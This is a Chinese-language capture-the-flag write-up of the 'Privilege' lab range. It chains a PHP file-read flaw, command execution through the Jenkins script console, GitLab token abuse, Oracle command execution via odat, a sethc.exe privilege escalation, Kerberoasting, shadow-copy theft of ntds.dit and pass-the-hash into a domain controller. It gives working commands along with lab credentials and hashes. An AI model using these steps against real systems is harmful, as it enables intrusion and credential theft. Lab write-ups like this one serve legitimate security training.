春秋云镜-Privilege

Privilege

flag1

信息收集

扫到备份文件www.zip

外网打点

拿到seay扫描一下,根据题目描述发现有任意文件读取

1
2
3
4
5
6
7
8
9
10
11

<?php
$logfile = rawurldecode( $_GET['logfile'] );
// Make sure the file is exist.
if ( file_exists( $logfile ) ) {
  // Get the content and echo it.
  $text = file_get_contents( $logfile );
  echo( $text );
}
exit;

直接读flag试试,失败?rdp后看phpstudy起的服务,能读才对

根据提示读jenkins密码

510235cf43f14e83b88a9f144199655b

直接去login

admin

510235cf43f14e83b88a9f144199655b

在/manage/script 可以执行命令

参考 https://www.freebuf.com/articles/web/376186.html#/

直接创建个用户rdp

1
2
println "net user dog qwer1234! /add".execute().text
println "net localgroup administrators dog /add".execute().text

flag2

fscan拿信息

内网信息

172.22.14.7 本机,已最高权限

172.22.14.46 XR-0923

172.22.14.11 XR-DC 域控

172.22.14.31 XR-ORACLE

172.22.14.16 GitLab

Gitlab API Token

解密

1
println(hudson.util.Secret.fromString("Gitlab API Token").getPlainText())

1
glpat-7kD_qLH2PiQv_ywB9hz2

用API-token列出GitLab项目

1
proxychains curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
[{
	"id": 6,
	"description": null,
	"name": "Internal Secret",
	"name_with_namespace": "XRLAB / Internal Secret",
	"path": "internal-secret",
	"path_with_namespace": "xrlab/internal-secret",
	"created_at": "2022-12-25T08:30:12.362Z",
	"default_branch": "main",
	"tag_list": [],
	"topics": [],
	"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/internal-secret.git",
	"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git",
	"web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret",
	"readme_url": null,
	"avatar_url": null,
	"forks_count": 0,
	"star_count": 0,
	"last_activity_at": "2022-12-25T08:30:12.362Z",
	"namespace": {
		"id": 8,
		"name": "XRLAB",
		"path": "xrlab",
		"kind": "group",
		"full_path": "xrlab",
		"parent_id": null,
		"avatar_url": null,
		"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
	}
}, {
	"id": 4,
	"description": null,
	"name": "XRAdmin",
	"name_with_namespace": "XRLAB / XRAdmin",
	"path": "xradmin",
	"path_with_namespace": "xrlab/xradmin",
	"created_at": "2022-12-25T07:48:16.751Z",
	"default_branch": "main",
	"tag_list": [],
	"topics": [],
	"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xradmin.git",
	"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git",
	"web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin",
	"readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md",
	"avatar_url": null,
	"forks_count": 0,
	"star_count": 0,
	"last_activity_at": "2023-05-30T10:27:31.762Z",
	"namespace": {
		"id": 8,
		"name": "XRLAB",
		"path": "xrlab",
		"kind": "group",
		"full_path": "xrlab",
		"parent_id": null,
		"avatar_url": null,
		"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
	}
}, {
	"id": 3,
	"description": null,
	"name": "Awenode",
	"name_with_namespace": "XRLAB / Awenode",
	"path": "awenode",
	"path_with_namespace": "xrlab/awenode",
	"created_at": "2022-12-25T07:46:43.635Z",
	"default_branch": "master",
	"tag_list": [],
	"topics": [],
	"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/awenode.git",
	"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git",
	"web_url": "http://gitlab.xiaorang.lab/xrlab/awenode",
	"readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md",
	"avatar_url": null,
	"forks_count": 0,
	"star_count": 0,
	"last_activity_at": "2022-12-25T07:46:43.635Z",
	"namespace": {
		"id": 8,
		"name": "XRLAB",
		"path": "xrlab",
		"kind": "group",
		"full_path": "xrlab",
		"parent_id": null,
		"avatar_url": null,
		"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
	}
}, {
	"id": 2,
	"description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook",
	"name": "XRWiki",
	"name_with_namespace": "XRLAB / XRWiki",
	"path": "xrwiki",
	"path_with_namespace": "xrlab/xrwiki",
	"created_at": "2022-12-25T07:44:18.589Z",
	"default_branch": "master",
	"tag_list": [],
	"topics": [],
	"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xrwiki.git",
	"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git",
	"web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki",
	"readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md",
	"avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png",
	"forks_count": 0,
	"star_count": 0,
	"last_activity_at": "2022-12-25T07:44:18.589Z",
	"namespace": {
		"id": 8,
		"name": "XRLAB",
		"path": "xrlab",
		"kind": "group",
		"full_path": "xrlab",
		"parent_id": null,
		"avatar_url": null,
		"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
	}
}, {
	"id": 1,
	"description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).",
	"name": "Monitoring",
	"name_with_namespace": "GitLab Instance / Monitoring",
	"path": "Monitoring",
	"path_with_namespace": "gitlab-instance-23352f48/Monitoring",
	"created_at": "2022-12-25T07:18:20.914Z",
	"default_branch": "main",
	"tag_list": [],
	"topics": [],
	"ssh_url_to_repo": "git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git",
	"http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git",
	"web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring",
	"readme_url": null,
	"avatar_url": null,
	"forks_count": 0,
	"star_count": 0,
	"last_activity_at": "2022-12-25T07:18:20.914Z",
	"namespace": {
		"id": 2,
		"name": "GitLab Instance",
		"path": "gitlab-instance-23352f48",
		"kind": "group",
		"full_path": "gitlab-instance-23352f48",
		"parent_id": null,
		"avatar_url": null,
		"web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"
	}
}]

克隆项目

1
2
3
git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git
git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git

在xradmin/ruoyi-admin/src/main/resources/application-druid.yml找到Oracle的账号和密码

Oracle

使用odat 连接oracle ,执行命令创建管理员用户

1
2
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user dog qwer1234! /add'
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators dog /add'

flag3&4

internal-secret里有一个文本,里面是一堆账号信息,从里面找到XR-0923的

XR-0923 (172.22.14.46)

zhangshuai

wSbEajHzZs

RDP上XR-0923的时候发现这个用户属于Remote Desktop UsersRemote Management Users组所以能evil-winrm上去

在系统中,LocalAccountTokenFilterPolicy的值默认为0,在这种默认情况下,只有系统默认管理员账户Administrator(SID 500)拥有凭证可以进行对主机的连接,本地管理员组的其他用户登录时将会显示“拒绝访问,如果用其他本地管理员组的其他用户进行登录,我们还需要修改注册表中LocalAccountTokenFilterPolicy值为1

在域环境中,无论目标主机下LocalAccountTokenFilterPolicy的值是否为1,只要是域管理员都具有连接凭证,目标主机允许域管理对自己进行WinRM远程连接,****还有一种情况就是普通域用户被管理员添加到本地管理员组,这时候就算值为0关闭状态,也可以默认bypassuac,拥有WinRM的远程连接凭证,可以成功连接

参考:https://forum.butian.net/share/2080#/

1
proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs

SeRestorePrivilege提权

修改服务二进制文件

覆盖系统进程使用的DLL

修改注册表设置

因为有SeRestorePrivilege,所以能无视ACL修改文件或者编辑注册表,类似于之前的放大镜提权,我们可以把cmd.exe重命名为sethc.exe,然后在锁屏界面连按五次shift启动sethc提权(或者修改utilman.exe,锁屏界面 win+U提权)

ACL(Access Control List,访问控制列表)是计算机系统和网络中用于管理资源访问权限的一种机制。它定义了哪些用户、组或系统进程可以访问特定资源(如文件、目录、网络资源等),以及允许执行的操作(如读取、写入、执行等)。

1
2
ren sethc.exe sethc.bak
ren cmd.exe sethc.exe

拿flag然后添加个admin账号重新登进去

1
2
net user dog qwer1234! /add
net localgroup administrators dog /add

重新rdp拿到flag3

上传猕猴桃拿ntml

b5a7f501c6626cf82b9d8a3dfe49fd66

Kerberoasting

拿着 XR-0923$ 的ntlm哈希看SPN能找到一个tianjing用户

枚举域环境中注册的 SPN(Service Principal Names)

1
proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':b5a7f501c6626cf82b9d8a3dfe49fd66' -dc-ip 172.22.14.11

抓一下哈希

1
proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':b5a7f501c6626cf82b9d8a3dfe49fd66' -dc-ip 172.22.14.11 -request-user tianjing

1
$krb5tgs$23$*tianjing$XIAORANG.LAB$xiaorang.lab/tianjing*$4b61de3e3fc44ffbaf89ec2cd77d2bba$0b6b9f0aa0a5fba610cc9d0994e4b9223280d53f965c39f06ca9f1d92c836b263c661631c03bf9d87b025bf16c94ec9b65918eae88cec36c614322c4c4f627366ef1a10adfdc94b564e31203fcb3094c596419b3e837c44e8584ee751996f0437b08bbfe86e3faed3a809a3476a519ddeb2f3b7e3fc13567aa28a5ce2c722d7b1d660434a33e786baa5f86727b6e964f9b39123c3ad66b419ea821ee289dceefa8f34d7e219a1c466fd6f2a713d49936bc6fde71aa95dbb350676fa5aaf48f51f0ceaa04e437964a6e2bcd84d90d757e840f43d36b4efc3b5ca39908af1c633f3a330070e26f4ac04c585b787c154969f80f5a44d268a8887a7430ac7707a3e768450dad833cda6fb72aa8f86fb15ef898ad8d43c3622eb5871d7084de77f51c90003bed4ec0ab0ccb8304ccce01e6136fc17379eeb0a622c67a60faec1fa4d91865dce000e2e217cc450fc52566e98da13979232e6ac19e3f6b2f09431b639ca4358523a96268766b22178dc57d6001de2b86ed13b5754131f8e49125051870d49e0a962a8fa90444fae5e90a8ff7b38dc4c9dac7260f9674ad7ae62a6da645f0d0025c1067c1d53b86b93fdef955a18d0360d94596f76459f75e626ca11b239b02119d49e463a5815c4c32f90a878b051f0086a20a2229427444725e54e0b86f316835acdb10fef819870c0b18b110e20d7508a025552740136cf193f26542e4f31f93ce6b7951150537e8cb96a0fbf5722a4a50ec5ed1263c8310f36b41b3867ecd1abd4852b3cadecc7d86175de08377f48400768ebcffb193b2aa2272747c910f154e93d149b5f1c6146202aa38d291fb0740d84d3f7f9502eb8286cd1b1d267c06d93b66429f3181297e7b0e9240108bf59e8a0310d0a89fb1344039fb34e924d1d8b9393e9c6c07a6295aa39474656e16ad08726191e645c7ad774fd940278c69c0a57b4b10ae55e323f0bcf2eb50f06b61c7446a4f1bb1f997e187d5665f32e6292235735171478c9a185a4d70eae0b515fe3cf227217c48f8379236aa3ea27a9637fc7d8fed3c3013f678715b8444e6463ef6e497f5a070d223d15b8a3129a0fd853d8fab3f6b3463eca29eba2e724a933ee6b8dbf98884707743eb8e78b0a4dae52a334c79bfb9199cc5c46b8a7564416c659635f5cdafcef031d16b5ccdd4459f52a72597f7058dce909b163ed61014a019e2a73fe44f1e2187c12e5e4fea2da3fc2f6170daf165ae20d95e92aa3beaa10e5cf4398e2476dce8e44b8cbbb92c7506545f51202296492b65b18c24e82bf27e975de915e75a01b9f793b7b14ac1ed32f1b173ae9d7d1efdc896e14af09ba4528a505e823b5c5f8b952194076ed849ec052cf0ed9aa2a7cb2bf1c7242d819bf191c41cfe2caf05a2aa2a8756bb627719a09314194a0ac0f42237b85967597c8bf541bdfd478efc66d590b0a5e4888119bf878fc31ccc346c412b5ffeef2d

保存1.txt 用hashcat爆破

1
hashcat -m 13100 -a 0 1.txt rockyou.txt --force
1
4e4b9223280d53f965c39f06ca9f1d92c836b263c661631c03bf9d87b025bf16c94ec9b65918eae88cec36c614322c4c4f627366ef1a10adfdc94b564e31203fcb3094c596419b3e837c44e8584ee751996f0437b08bbfe86e3faed3a809a3476a519ddeb2f3b7e3fc13567aa28a5ce2c722d7b1d660434a33e786baa5f86727b6e964f9b39123c3ad66b419ea821ee289dceefa8f34d7e219a1c466fd6f2a713d49936bc6fde71aa95dbb350676fa5aaf48f51f0ceaa04e437964a6e2bcd84d90d757e840f43d36b4efc3b5ca39908af1c633f3a330070e26f4ac04c585b787c154969f80f5a44d268a8887a7430ac7707a3e768450dad833cda6fb72aa8f86fb15ef898ad8d43c3622eb5871d7084de77f51c90003bed4ec0ab0ccb8304ccce01e6136fc17379eeb0a622c67a60faec1fa4d91865dce000e2e217cc450fc52566e98da13979232e6ac19e3f6b2f09431b639ca4358523a96268766b22178dc57d6001de2b86ed13b5754131f8e49125051870d49e0a962a8fa90444fae5e90a8ff7b38dc4c9dac7260f9674ad7ae62a6da645f0d0025c1067c1d53b86b93fdef955a18d0360d94596f76459f75e626ca11b239b02119d49e463a5815c4c32f90a878b051f0086a20a2229427444725e54e0b86f316835acdb10fef819870c0b18b110e20d7508a025552740136cf193f26542e4f31f93ce6b7951150537e8cb96a0fbf5722a4a50ec5ed1263c8310f36b41b3867ecd1abd4852b3cadecc7d86175de08377f48400768ebcffb193b2aa2272747c910f154e93d149b5f1c6146202aa38d291fb0740d84d3f7f9502eb8286cd1b1d267c06d93b66429f3181297e7b0e9240108bf59e8a0310d0a89fb1344039fb34e924d1d8b9393e9c6c07a6295aa39474656e16ad08726191e645c7ad774fd940278c69c0a57b4b10ae55e323f0bcf2eb50f06b61c7446a4f1bb1f997e187d5665f32e6292235735171478c9a185a4d70eae0b515fe3cf227217c48f8379236aa3ea27a9637fc7d8fed3c3013f678715b8444e6463ef6e497f5a070d223d15b8a3129a0fd853d8fab3f6b3463eca29eba2e724a933ee6b8dbf98884707743eb8e78b0a4dae52a334c79bfb9199cc5c46b8a7564416c659635f5cdafcef031d16b5ccdd4459f52a72597f7058dce909b163ed61014a019e2a73fe44f1e2187c12e5e4fea2da3fc2f6170daf165ae20d95e92aa3beaa10e5cf4398e2476dce8e44b8cbbb92c7506545f51202296492b65b18c24e82bf27e975de915e75a01b9f793b7b14ac1ed32f1b173ae9d7d1efdc896e14af09ba4528a505e823b5c5f8b952194076ed849ec052cf0ed9aa2a7cb2bf1c7242d819bf191c41cfe2caf05a2aa2a8756bb627719a09314194a0ac0f42237b85967597c8bf541bdfd478efc66d590b0a5e4888119bf878fc31ccc346c412b5ffeef2d:DPQSXSXgh2

tianjing

DPQSXSXgh2

1
proxychains evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 

1
whoami /priv

有备份以及还原文件和目录的权限,

可以卷影拷贝然后读sam(ntds.dit) 和 system

SAM是安全账户管理器数据库,包含了本地用户及用户组,包括它们的口令及其他属性,位于注册表的HKLM\SAM下面

ntds.dit 是 Windows 域控制器中存储 Active Directory 数据库的文件,包含域内所有用户、计算机、组等信息,以及用户的密码哈希(NTLM 和 Kerberos 密钥)。

SYSTEM 是 Windows 系统中的一个注册表文件,包含加密 ntds.dit 文件所需的密钥信息(称为 BootKey)。

卷影拷贝

本地创建一个raj.dsh

写入

1
2
3
4
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

用unix2dos将dsh文件的编码间距转换为Windows兼容的编码和间距

1
unix2dos raj.dsh

Windows根目录创建文件夹 (权限问题)上传raj.dsh

卷影拷贝

1
diskshadow /s raj.dsh

复制到到当前目录,也就是我们创建的这个目录

1
RoboCopy /b z:\windows\ntds . ntds.dit

下载sam和system

1
download ntds.dit

下载system

1
2
reg save HKLM\SYSTEM system
download system

最后用download下来的ntds.dit和system本地进行解密

1
impacket-secretsdump -ntds ntds.dit -system system local

PTH拿下域控

PTHPass-the-Hash 的缩写,是一种利用 Windows 系统中存储的 NTLM 哈希(或 Kerberos 密钥)进行身份验证的攻击技术。与传统的密码认证不同,PTH 攻击不需要知道用户的明文密码,而是直接使用密码哈希进行认证。

1
proxychains evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"

PS: github page的静态页面 不允许push api key这种敏感信息,可以在/security/secret-scanning允许敏感操作